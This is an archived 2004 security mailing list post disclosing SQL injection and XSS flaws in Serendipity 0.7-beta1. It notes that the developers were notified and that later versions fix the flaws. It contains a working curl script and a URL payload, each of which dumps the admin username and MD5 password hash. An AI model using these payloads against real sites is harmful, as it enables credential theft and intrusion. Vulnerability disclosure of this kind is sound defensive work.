lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: acidbits at gmail.com (aCiDBiTS)
Subject: Serendipity 0.7-beta1 SQL Injection PoC

Serendipity 0.7-beta1   SQL Injection   Proof of Concept
By aCiDBiTS    acidbits@...il.com      13-September-2004

	
"Serendipity (http://www.s9y.org/) is a weblog/blog system,
implemented with PHP. It is standards compliant, feature rich and open
source (BSD License)."
	
There is no user input sanitation for parameters entry_id in exit.php
and comment.php prior being used in a SQL query. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code. Comment.php
is also prone to XSS through email and username post's fields.
Serendipity 0.7-beta1 and older versions are vulnerable.

Developer team had been notified 13-September-2004 and this
vulnerabilities are fixed from Serendipity 0.7-beta3.
	
These PoCs dumps admin's username and md5(password).



Proof of Concept 1
------------------

Usage: ./ser_sqli_poc.sh URL_to_Serendipity_Weblog

ser_sqli_poc.sh
---------8<-----------8<-------------
#!/bin/sh

echo -n "Username:      "
curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20username%20from%20serendipity_authors%20where%20authorid%3D1"
| grep Location | cut -b10-
echo -n "MD5(password): "
curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20password%20from%20serendipity_authors%20where%20authorid%3D1"
| grep Location | cut -b10-
---------8<-----------8<-------------



Proof of Concept 2
------------------

Copy&Paste this to your browser and edit URL_to_Serendipity_Weblog.

http://URL_to_Serendipity_Weblog/comment.php?serendipity[type]=trackbacks&serendipity[entry_id]=0%20and%200%20union%20select%201,2,3,4,username,password,7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20/*




     \    / 
      (Oo) 
     //||\\

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ